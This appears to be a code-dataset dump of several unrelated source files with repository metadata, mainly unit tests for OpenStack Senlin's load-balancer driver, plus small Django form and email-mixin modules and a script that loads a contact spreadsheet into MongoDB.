'''
rIndexes = {'allowedRolesAndUsers': 'KeywordIndex'
, 'effective': 'FieldIndex'
, 'expires': 'FieldIndex'}
ct = getToolByName(self, 'portal_catalog')
map(lambda x, ct=ct: ct.delIndex(x), rIndexes.keys())
map(lambda x, ct=ct: ct.addIndex(x[0], x[1]), rIndexes.items())
ct.manage_reindexIndex(ids=rIndexes.keys(), REQUEST=REQUEST)
return 'Catalog Indexes rebuilt.'
| [
"[email protected]"
] | |
a519cbe8ed2abdf0645b211d1492e3723c52e6c2 | c2bdcd5aec95d5c4ac4322f166c2ef9b2b8992f9 | /kurstag_8/beispiele_8/Vehicle2.py | 9a0bd64199b7f79a94416879935e99e849ee1964 | [] | no_license | softborg/Python_HWZ_Start | 4437c5d8676301db8f4c42b75c98f0cc91320012 | 6361647113365df66e3ad84a0d1d1b563137ebbd | refs/heads/master | 2022-07-21T16:27:30.333598 | 2022-07-12T12:08:37 | 2022-07-12T12:08:37 | 252,724,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24 | py | class Vehicle:
pass
| [
"[email protected]"
] | |
2bfa12840166c969a9cdab6b15d1371191c6a2c6 | 5a281cb78335e06c631181720546f6876005d4e5 | /senlin-7.0.0/senlin/tests/unit/drivers/test_lbaas.py | 1bdc0d366f64a91318ae7c63fb4bef33cd72bff5 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 29,598 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import mock
from oslo_context import context as oslo_context
from senlin.common import exception
from senlin.common.i18n import _
from senlin.drivers.os import lbaas
from senlin.drivers.os import neutron_v2
from senlin.drivers.os import octavia_v2
from senlin.engine import node as nodem
from senlin.tests.unit.common import base
from senlin.tests.unit.common import utils
class TestOctaviaLBaaSDriver(base.SenlinTestCase):
def setUp(self):
super(TestOctaviaLBaaSDriver, self).setUp()
self.context = utils.dummy_context()
self.conn_params = self.context.to_dict()
self.lb_driver = lbaas.LoadBalancerDriver(self.conn_params)
self.lb_driver.lb_status_timeout = 10
self.patchobject(neutron_v2, 'NeutronClient')
self.patchobject(octavia_v2, 'OctaviaClient')
self.nc = self.lb_driver.nc()
self.oc = self.lb_driver.oc()
self.vip = {
'subnet': 'subnet-01',
'address': '192.168.1.100',
'admin_state_up': True,
'protocol': 'HTTP',
'protocol_port': 80,
'connection_limit': 50
}
self.pool = {
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'admin_state_up': True
}
self.hm = {
"type": "HTTP",
"delay": "1",
"timeout": 1,
"max_retries": 5,
"pool_id": "POOL_ID",
"admin_state_up": True,
"http_method": "GET",
"url_path": "/index.html",
"expected_codes": "200,201,202"
}
def test_init(self):
conn_params = self.context.to_dict()
conn_params['lb_status_timeout'] = 10
res = lbaas.LoadBalancerDriver(conn_params)
self.assertEqual(conn_params, res.conn_params)
self.assertIsNone(res._nc)
@mock.patch.object(neutron_v2, 'NeutronClient')
def test_nc_initialize(self, mock_neutron_client):
conn_params = self.context.to_dict()
conn_params['lb_status_timeout'] = 10
fake_nc = mock.Mock()
mock_neutron_client.return_value = fake_nc
lb_driver = lbaas.LoadBalancerDriver(conn_params)
self.assertIsNone(lb_driver._nc)
# Create a new NeutronClient
res = lb_driver.nc()
mock_neutron_client.assert_called_once_with(conn_params)
self.assertEqual(fake_nc, res)
# Use the existing NeutronClient stored in self._nc
fake_nc_new = mock.Mock()
mock_neutron_client.return_value = fake_nc_new
res1 = lb_driver.nc()
mock_neutron_client.assert_called_once_with(conn_params)
self.assertNotEqual(fake_nc_new, res1)
self.assertEqual(res, res1)
def test_wait_for_lb_ready(self):
lb_id = 'ID1'
lb_obj = mock.Mock()
lb_obj.id = lb_id
lb_obj.provisioning_status = 'ACTIVE'
lb_obj.operating_status = 'ONLINE'
self.oc.loadbalancer_get.return_value = lb_obj
res = self.lb_driver._wait_for_lb_ready(lb_id)
self.assertTrue(res)
def test_wait_for_lb_ready_ignore_not_found(self):
lb_id = 'LB_ID'
self.oc.loadbalancer_get.return_value = None
res = self.lb_driver._wait_for_lb_ready(lb_id, ignore_not_found=True)
self.assertTrue(res)
@mock.patch.object(eventlet, 'sleep')
def test_wait_for_lb_ready_timeout(self, mock_sleep):
lb_id = 'LB_ID'
lb_obj = mock.Mock(id=lb_id)
self.oc.loadbalancer_get.return_value = lb_obj
lb_obj.provisioning_status = 'PENDING_UPDATE'
lb_obj.operating_status = 'OFFLINE'
res = self.lb_driver._wait_for_lb_ready(lb_id)
self.assertFalse(res)
mock_sleep.assert_called_once_with(10)
def test_lb_create_succeeded(self):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
pool_obj = mock.Mock()
hm_obj = mock.Mock()
lb_obj.id = 'LB_ID'
lb_obj.vip_address = '192.168.1.100'
listener_obj.id = 'LISTENER_ID'
pool_obj.id = 'POOL_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
hm_obj.id = 'HEALTHMONITOR_ID'
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.oc.pool_create.return_value = pool_obj
self.oc.healthmonitor_create.return_value = hm_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertTrue(status)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.assertEqual('LB_ID', res['loadbalancer'])
self.assertEqual('192.168.1.100', res['vip_address'])
self.oc.listener_create.assert_called_once_with(
'LB_ID', self.vip['protocol'], self.vip['protocol_port'],
self.vip['connection_limit'], self.vip['admin_state_up'])
self.assertEqual('LISTENER_ID', res['listener'])
self.oc.pool_create.assert_called_once_with(
self.pool['lb_method'], 'LISTENER_ID', self.pool['protocol'],
self.pool['admin_state_up'])
self.assertEqual('POOL_ID', res['pool'])
self.oc.healthmonitor_create.assert_called_once_with(
self.hm['type'], self.hm['delay'], self.hm['timeout'],
self.hm['max_retries'], 'POOL_ID', self.hm['admin_state_up'],
self.hm['http_method'], self.hm['url_path'],
self.hm['expected_codes'])
self.assertEqual('HEALTHMONITOR_ID', res['healthmonitor'])
self.lb_driver._wait_for_lb_ready.assert_called_with('LB_ID')
calls = [mock.call('LB_ID') for i in range(1, 5)]
self.lb_driver._wait_for_lb_ready.assert_has_calls(
calls, any_order=False)
def test_lb_create_loadbalancer_creation_failed(self):
lb_obj = mock.Mock()
lb_obj.id = 'LB_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
self.oc.loadbalancer_create.return_value = lb_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [False]
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating loadbalancer (%s).') % 'LB_ID'
self.assertEqual(msg, res)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.lb_driver._wait_for_lb_ready.assert_called_once_with('LB_ID')
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID')
# Exception happens in subnet_get.
self.nc.subnet_get.side_effect = exception.InternalError(
code=500, message='GET FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in getting subnet: GET FAILED.')
self.assertEqual(msg, res)
# Exception happens in loadbalancer_create.
self.nc.subnet_get.side_effect = None
self.oc.loadbalancer_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating loadbalancer: CREATE FAILED.')
self.assertEqual(msg, res)
@mock.patch.object(eventlet, 'sleep')
def test_lb_create_listener_creation_failed(self, mock_sleep):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
lb_obj.id = 'LB_ID'
listener_obj.id = 'LISTENER_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating listener (%s).') % 'LISTENER_ID'
self.assertEqual(msg, res)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.oc.listener_create.assert_called_once_with(
'LB_ID', self.vip['protocol'], self.vip['protocol_port'],
self.vip['connection_limit'], self.vip['admin_state_up'])
self.lb_driver._wait_for_lb_ready.assert_called_with('LB_ID')
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID', listener='LISTENER_ID')
# Exception happens in listen_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.oc.listener_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating lb listener: CREATE FAILED.')
self.assertEqual(msg, res)
def test_lb_create_pool_creation_failed(self):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
pool_obj = mock.Mock()
lb_obj.id = 'LB_ID'
lb_obj.vip_address = '192.169.1.100'
listener_obj.id = 'LISTENER_ID'
pool_obj.id = 'POOL_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True, False]
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.oc.pool_create.return_value = pool_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating pool (%s).') % 'POOL_ID'
self.assertEqual(msg, res)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.oc.listener_create.assert_called_once_with(
'LB_ID', self.vip['protocol'], self.vip['protocol_port'],
self.vip['connection_limit'], self.vip['admin_state_up'])
self.oc.pool_create.assert_called_once_with(
self.pool['lb_method'], 'LISTENER_ID', self.pool['protocol'],
self.pool['admin_state_up'])
self.lb_driver._wait_for_lb_ready.assert_called_with('LB_ID')
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID', listener='LISTENER_ID', pool='POOL_ID')
# Exception happens in pool_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True, False]
self.oc.pool_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating lb pool: CREATE FAILED.')
self.assertEqual(msg, res)
def test_lb_create_healthmonitor_creation_failed(self):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
pool_obj = mock.Mock()
hm_obj = mock.Mock()
lb_obj.id = 'LB_ID'
listener_obj.id = 'LISTENER_ID'
pool_obj.id = 'POOL_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
hm_obj.id = 'HEALTHMONITOR_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True,
True, False]
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.oc.pool_create.return_value = pool_obj
self.oc.healthmonitor_create.return_value = hm_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating health monitor (%s).') % 'HEALTHMONITOR_ID'
self.assertEqual(msg, res)
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID', listener='LISTENER_ID', pool='POOL_ID',
healthmonitor='HEALTHMONITOR_ID')
# Exception happens in healthmonitor_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True, True]
self.oc.healthmonitor_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating lb health monitor: CREATE FAILED.')
self.assertEqual(msg, res)
@mock.patch.object(neutron_v2, 'NeutronClient')
def test_lb_find(self, mock_neutron):
self.lb_driver.lb_find("FAKELB")
self.oc.loadbalancer_get.assert_called_once_with(
"FAKELB", False, False)
def test_lb_delete(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertTrue(status)
self.assertEqual('LB deletion succeeded', res)
self.oc.loadbalancer_delete.assert_called_once_with('LB_ID')
self.oc.listener_delete.assert_called_once_with('LISTENER_ID')
self.oc.pool_delete.assert_called_once_with('POOL_ID')
self.oc.healthmonitor_delete.assert_called_once_with('HM_ID')
calls = [mock.call('LB_ID') for i in range(1, 4)]
self.lb_driver._wait_for_lb_ready.assert_has_calls(
calls, any_order=False)
def test_lb_healthmonitor_delete_internalerror(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.oc.healthmonitor_delete.side_effect = exception.InternalError(
code=500, message='DELETE FAILED')
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertFalse(status)
msg = _('Failed in deleting healthmonitor: DELETE FAILED.')
self.assertEqual(msg, res)
def test_lb_pool_delete_internalerror(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.oc.pool_delete.side_effect = exception.InternalError(
code=500, message='DELETE FAILED')
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertFalse(status)
msg = _('Failed in deleting lb pool: DELETE FAILED.')
self.assertEqual(msg, res)
def test_lb_listener_delete_internalerror(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.oc.listener_delete.side_effect = exception.InternalError(
code=500, message='DELETE FAILED')
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertFalse(status)
msg = _('Failed in deleting listener: DELETE FAILED.')
self.assertEqual(msg, res)
def test_lb_delete_no_physical_object(self):
kwargs = {'loadbalancer': 'LB_ID'}
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertTrue(status)
self.assertEqual('LB deletion succeeded', res)
self.oc.loadbalancer_delete.assert_called_once_with('LB_ID')
self.assertEqual(0, self.oc.healthmonitor_delete.call_count)
self.assertEqual(0, self.oc.pool_delete.call_count)
self.assertEqual(0, self.oc.listener_delete.call_count)
self.lb_driver._wait_for_lb_ready.assert_called_once_with(
'LB_ID', ignore_not_found=True)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_succeeded(self, mock_get_current, mock_load):
fake_context = mock.Mock()
mock_get_current.return_value = fake_context
node = mock.Mock()
lb_id = 'LB_ID'
pool_id = 'POOL_ID'
port = '80'
subnet = 'subnet'
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.ip_version = '4'
subnet_obj.name = 'subnet'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
member = mock.Mock(id='MEMBER_ID')
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr1_net1', 'version': '6'},
{'addr': 'ipaddr2_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create.return_value = member
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
res = self.lb_driver.member_add(node, lb_id, pool_id, port, subnet)
self.assertEqual('MEMBER_ID', res)
self.nc.subnet_get.assert_called_once_with(subnet)
self.nc.network_get.assert_called_once_with('NETWORK_ID')
# Make sure the ip matches with subnet ip_version
self.oc.pool_member_create.assert_called_once_with(
pool_id, 'ipaddr2_net1', port, 'SUBNET_ID')
self.lb_driver._wait_for_lb_ready.assert_has_calls(
[mock.call('LB_ID'), mock.call('LB_ID')])
mock_load.assert_called_once_with(fake_context, db_node=node)
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_subnet_get_failed(self, mock_get_current):
self.nc.subnet_get.side_effect = exception.InternalError(
code=500, message="Can't find subnet")
res = self.lb_driver.member_add('node', 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_network_get_failed(self, mock_get_current):
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
# Exception happens in network_get
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.side_effect = exception.InternalError(
code=500, message="Can't find NETWORK_ID")
res = self.lb_driver.member_add('node', 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_lb_unready_for_member_create(self, mock_get_current,
mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Exception happens in pool_member_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = False
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create.side_effect = exception.InternalError(
code=500, message="CREATE FAILED")
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
self.lb_driver._wait_for_lb_ready.assert_called_once_with('LB_ID')
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_member_create_failed(self, mock_get_current,
mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Exception happens in pool_member_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create.side_effect = exception.InternalError(
code=500, message="CREATE FAILED")
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_ip_version_match_failed(self, mock_get_current,
mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '6'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '6'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Node does not match with subnet ip_version
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create = mock.Mock(id='MEMBER_ID')
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_wait_for_lb_timeout(self, mock_get_current, mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Wait for lb ready timeout after creating member
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_node_not_in_subnet(self, mock_get_current, mock_load):
node = mock.Mock()
lb_id = 'LB_ID'
pool_id = 'POOL_ID'
port = '80'
subnet = 'subnet'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network3'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1'}],
'network2': [{'addr': 'ipaddr_net2'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
self.nc.network_get.return_value = network_obj
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
res = self.lb_driver.member_add(node, lb_id, pool_id, port, subnet)
self.assertIsNone(res)
def test_member_remove_succeeded(self):
lb_id = 'LB_ID'
pool_id = 'POOL_ID'
member_id = 'MEMBER_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
res = self.lb_driver.member_remove(lb_id, pool_id, member_id)
self.assertTrue(res)
self.oc.pool_member_delete.assert_called_once_with(pool_id, member_id)
self.lb_driver._wait_for_lb_ready.assert_has_calls(
[mock.call(lb_id), mock.call(lb_id, ignore_not_found=True)])
def test_member_remove_lb_unready_for_member_delete(self):
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = False
res = self.lb_driver.member_remove('LB_ID', 'POOL_ID', 'MEMBER_ID')
self.assertFalse(res)
self.lb_driver._wait_for_lb_ready.assert_called_once_with('LB_ID')
def test_member_remove_member_delete_failed(self):
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
self.oc.pool_member_delete.side_effect = exception.InternalError(
code=500, message='')
res = self.lb_driver.member_remove('LB_ID', 'POOL_ID', 'MEMBER_ID')
self.assertFalse(res)
self.oc.pool_member_delete.assert_called_once_with('POOL_ID',
'MEMBER_ID')
def test_member_remove_wait_for_lb_timeout(self):
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.oc.pool_member_delete.side_effect = None
res = self.lb_driver.member_remove('LB_ID', 'POOL_ID', 'MEMBER_ID')
self.assertIsNone(res)
self.lb_driver._wait_for_lb_ready.assert_has_calls(
[mock.call('LB_ID'), mock.call('LB_ID', ignore_not_found=True)])
| [
"Wayne [email protected]"
] | Wayne [email protected] |
00c5c1b70eb024b63457ed9b09528d8528502b80 | cf05dc6b31bb83b0b71cd357d7d19dfea7ad40a0 | /office_system/apps/users/forms.py | 2f956301bb4f9be16de57da66f79a02283317f08 | [] | no_license | peng-python/oa | 5df69a935b20b8200808133bf92d6757016cb9fa | bfc600a9c439866e1617f297007dc10fd8b86090 | refs/heads/master | 2020-03-17T20:21:54.927871 | 2018-05-18T05:15:28 | 2018-05-18T05:15:28 | 133,905,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django import forms
class LoginFrom(forms.Form):
username = forms.CharField(required=True)
password = forms.CharField(required=True, min_length=8) | [
"[email protected]"
] | |
ecad8ffd7a025b4ab4b4e0d41a5049f9c3ba1ac2 | 83d43c7b59c5cb5d7e5e793f76a26e588d52ffc2 | /eventex/subscriptions/mixins.py | 9687d96ac903e9388789a1d76f3d2caba68e4ce4 | [] | no_license | rodrigoddc/wttd | ec548a13fdc5f6d7330daa2ce53b9e3fe3549bc6 | fd5b4587cd3851668be8b85cf519f59c194a631c | refs/heads/master | 2023-03-29T11:02:33.791149 | 2021-03-28T18:05:19 | 2021-03-28T18:05:19 | 342,949,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | from django.conf import settings
from django.core import mail
from django.template.loader import render_to_string
from django.views.generic import CreateView
class EmailCreateMixin:
email_to = None
email_context_name = None
email_template_name = None
email_from = settings.DEFAULT_FROM_EMAIL
email_subject = ''
def send_mail(self):
# send subscription email
subject = self.email_subject
from_email = self.email_from
to_email = [self.get_email_to()]
template_name = self.get_email_template_name()
context = self.get_email_context_data()
body = render_to_string(template_name, context)
return mail.send_mail(subject=subject, message=body, from_email=from_email, recipient_list=to_email)
def get_email_context_data(self, **kwargs) -> dict:
context = dict(kwargs)
context.setdefault(self.get_email_context_name(), self.object)
return context
def get_email_context_name(self):
if self.email_context_name:
return self.email_context_name
return self.object._meta.model_name
def get_email_to(self):
if self.email_to:
return self.email_to
return self.object.email
def get_email_template_name(self):
""" When not provide, find email template by convention 'app_label'/'model_label'_email.txt """
if self.email_template_name:
return self.email_template_name
meta = self.object._meta
return f'{meta.app_label}/{meta.model_name}_email.txt'
class EmailCreateView(EmailCreateMixin, CreateView):
def form_valid(self, form):
response = super().form_valid(form)
self.send_mail()
return response
| [
"[email protected]"
] | |
e52e408df819be554e75d2ac286768fecdfd6097 | 060e82b46016744deb7da7c940f97d0dea39d1b3 | /excel/定向分配/赵土良100445/ztl_python_script/To_mongo/ztl.py | 1fa3c0c96bb707e8b2bfcc393884c9065dcf378b | [] | no_license | yangwen1997/- | eb8c609d8af3f4493adf70d10df8cc5f561bcf60 | 197ae391ff1be36189ba003b025fd4802d703e00 | refs/heads/master | 2022-12-08T17:11:57.910664 | 2019-11-12T01:32:17 | 2019-11-12T01:32:17 | 160,466,240 | 0 | 1 | null | 2022-12-08T05:24:52 | 2018-12-05T05:34:19 | Python | UTF-8 | Python | false | false | 1,872 | py | '''
@author : yangwenlong
@file : ztl
@intro : 4320条-赵土良存入monmgo
@creatime : 2019/9/25
'''
import xlrd
import hashlib
from ztl_python_script.common import Enterprise_db,get_log
log = get_log()
#使用xlrd打开工作本(excel文件)
book = xlrd.open_workbook(r'D:\白名单\定向分配资源整理\excel\定向分配\赵土良100445\2016年8月4320条-赵土良.xlsx')
#使用已经打开的excel文件里面的sheet_by_index(0)方法来获取该excel的文档对象
sheet=book.sheet_by_index(0)
def save(item):
item["_id"] = hashlib.md5(str(item["电话"]).encode('utf-8')).hexdigest()
Enterprise_db.save(item)
log.info("数据{}存入mongodb成功".format(item["电话"]))
# 循环ncols可以获取整列内容
# 循环获取每行的内容
for i in range(sheet.nrows):
if i == 0:
continue
else:
item = {}
item["公司"] = sheet.row_values(i)[0]
item["公司类型"] = sheet.row_values(i)[1]
item["负责人姓名"] = sheet.row_values(i)[2]
